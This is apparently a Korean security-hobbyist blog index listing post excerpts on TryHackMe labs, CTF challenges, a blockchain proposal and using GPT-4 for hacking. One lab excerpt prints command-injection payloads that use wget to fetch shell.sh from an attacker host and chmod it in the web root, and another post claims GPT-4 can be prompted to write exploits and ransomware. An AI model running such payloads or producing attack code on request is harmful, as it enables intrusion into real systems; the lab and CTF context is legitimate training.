본문 바로가기

hacking sorcerer

 (372)
블록체인 기반 언어 학습 토큰 생태계 모델 코드 제안 블록체인 기반 언어 학습 토큰 생태계는 한국어 학습자와 원어민 교사를 연결하는 플랫폼을 제공합니다. 이 플랫폼은 블록체인 기술과 분산형 애플리케이션(DApp)을 활용하여 사용자의 편의성을 최대화하고, 교사와 학생 사이의 매칭, 예약, 지불 등의 프로세스를 투명하게 관리합니다. (참가자: 이 생태계에는 세 가지 주요 참가자가 있습니다: 이용자(한국어 학습자), 선생님(한국어 원어민 교사), 그리고 중개자(플랫폼 운영자)) 이용자: 이용자는 플랫폼에서 토큰을 구매하여 교사와 수업을 예약하고, 수업 후에는 피드백을 제공하여 교사의 수업을 평가합니다. 선생님: 선생님은 이용자에게 한국어를 가르칩니다. 수업이 완료되면, 교사는 토큰을 통해 보상을 받습니다. 교사는 또한 피드백을 받아 자신의 교육 방법을 개선하고,..
오늘도 즐거운 해킹 실습 yt_url= ---;wget${IFS}http://10.9.32.166:8090/shell.sh;: This command downloads a file named shell.sh from a server located at http://10.9.32.166:8090/. The yt_url variable seems irrelevant in this context. 위의 내용처럼 yt_url 오늘 실습에서는 해당 지점에 명령어를 넣을 수 있는 취약점이 있었다. 그 취약점을 이용하여 거의 어떠한 명령어든 실행이 가능했다. ls 혹은 id 혹은 중요한 파일 등을 읽는 것 등이 모두 가능했다. yt_url=--version;chmod${IFS}755${IFS}/var/www/html/shell.sh;: Th..
Tryhackme GOD & Kaggle Expert 동시 달성 (feat. 주체적이고 깊은 생각) (내가 받은 badges나 certificates 등이 엄청 많다.. 너무 많아서 일부만 올렸다) ​ 나 나름대로는 정말 기쁜 일인 듯 하다. 어느새 Tryhackme로는 GOD이라는 굉장히 높은 단계까지 도달했다. (하루에) 그리 많은 시간을 투자하지는 않았는데도 약 10개월 정도 걸렸다. 역시 기본이 탄탄하면 어떤 분야의 어떤 플랫폼의 어떤 업무를 하더라도 충분히 소화할 수 있는 게 아닌가 싶다. 그리고 정말 감사하게도 참여한 지 몇 개월 안 되는 Kaggle에서도 (뭐 아직 discussion 이기는 하지만) 공식적으로 Expert단계를 받았다. 내 목표 중에서 하나는 Tryhackme에서 GOD 칭호를 받는 거였고 또 다른 하나는 Kaggle에서 Expert를 받는 거였는데 최근에 와서 정말 감사..
gpt4로 익스플로잇 코드 작성하기 (옛날 방식을 버려라) 이전에 gpt4가 해킹 실력이 아주 뛰어나다는 말을 했다. 그렇게 말하면 자연스럽게 따라나올 수 있는 질문이 정말로 gpt4가 익스플로잇 코드까지도 잘 작성할 수 있느냐 하는 것이다. 충분히 타당한 질문이다 ​ 이미 gpt4는 지식 수준에서 전문가들도 능가하기 때문이다. (즉 이미 지식 차원이나 여타 기본 실습으로는 비빌 수 있는 차원이 아니다) ​ 그렇다고 한다면, 정말로 이걸 통해서 굉장히 구체적이고 자잘한 부분까지도 다루어야 하는 익스플로잇 코드까지도 작성할 수 있느냐 이것도 역시 궁금할 수 있는 부분이다. 그런데 이미 보안 뉴스만 몇 개 봐도 gpt4로 prompt engineering 만 조금 잘 해주면 굉장히 빼어난 수준의 침투 코드나 해킹 프로그램 심지어 랜섬웨어 까지도 만들 수 있다는 것이..
정말 가르쳐주려고 했는데 팀원들이 뜯어 말릴 때 들었어야 했다 물론 뜯어말렸다는 건 좀 과장이기는 하지만 ㅋㅋㅋㅋㅋ 작년 쯤인가 우연히 어떤 애를 알게 되었다 그러다가 그 친구가 자신에게 해킹을 알려달라고 하길래 직접 만나게 되었다 같이 얼굴도 보고 말도 하다보니 생각보다 말이 잘 통해서 서로 알고지내기로 했다 그런데 계속 알고지내다보니 이 친구는 해킹을 더 알고싶어하는 것 같았다 그래서 어찌저찌해서 이 친구에게 (영국에 가기 전에) 해킹과 보안에 관련해서 진수 essence 를 알려주고 떠나야겠다고 생각했다 사실 나는 AI도 연구하고 있기 때문에 단순 CTF 방식이 얼마나 바보 같은 방식인지 - 이를 포함한 한고쿠의 많은 잼민 군들이 해킹이나 보안을 배우는 방식이 얼마나 잘못되어있는지 잘 알고 있다. 물론, 그들의 방식이 결코 틀렸다고는 말할 수 없다. 정작 나도..
가장 기본이 되는 공격 방식 (attack vector) 이 내용은 해킹의 근간이 되는 공격 방식을 정말 잘 담고 있어서 사실 굉장히 기본 중의 기본임에도 블로그에 간단히 정리해보고 싶어서 아주 간단히 정리해본다 다만, 내가 설명을 자세히 하기 보다는 그냥 전체적인 흐름을 보는 걸 권해드리고 싶다. (참고 : tryhackme Vulnversity) 먼저 이 내용은 내부망에 들어가는 건 너무 쉽게 되어 있다 요런 식으로 내부 시스템에 들어간다 아마 이 내용은 너무 기본 중에 기본이라 정말 해커라면 이 내용을 모르는 사람은 없으리라고 생각한다 이 방의 묘미는 root 권한을 어떻게 획득하느냐 인데 단서가 조금 적기는 하지만 find / -user root -perm -4000 -exec ls -ldb {} \; 이 명령어를 치면 필요한 단서를 충분히 얻을 수 있..
흠냐 #include #include #include #include ​ #define FLAGSIZE_MAX 64 ​ char flag[FLAGSIZE_MAX]; ​ void sigsegv_handler(int sig) { printf("%s\n", flag); fflush(stdout); exit(1); } ​ void vuln(char *input){ char buf2[16]; strcpy(buf2, input); } ​ int main(int argc, char **argv){ FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("%s %s", "Please create 'flag.txt' in this directory with your", "own ..
gpt도 활용하는 방법이 있어요 그냥 무턱대고 쓰는게 절대로 아니랍니당~ (헤헷 4 의 위력) 오늘도 대단한 능력을 가진 GPT 4와 핸드레이 실습을 해보았다 참고로 말한다면, chat gpt는 주인장의 실력에 따라 편차가 꽤 크다 (실제 실험 결과임) 호구 븅딱 같은 주인을 만나면 풀지 못하는 문제도 주인장 실력이 꽤 뛰어나면 느끈히~ 풀어낸다 물론 그렇다고 gpt4가 나비에-스트로크 방정식이나 골드바흐 추측을 풀 수 있다는 건 아니다. gpt를 최대한 활용하려면 주인장 실력도 제법 뛰어나야 한다. ​ .arch armv8-a .file "chall.c" .text .align 2 .global func1 .type func1, %function func1: sub sp, sp, #16 str w0, [sp, 12] str w1, [sp, 8] ldr w1, [sp, 12] ldr w0, [sp..

티스토리툴바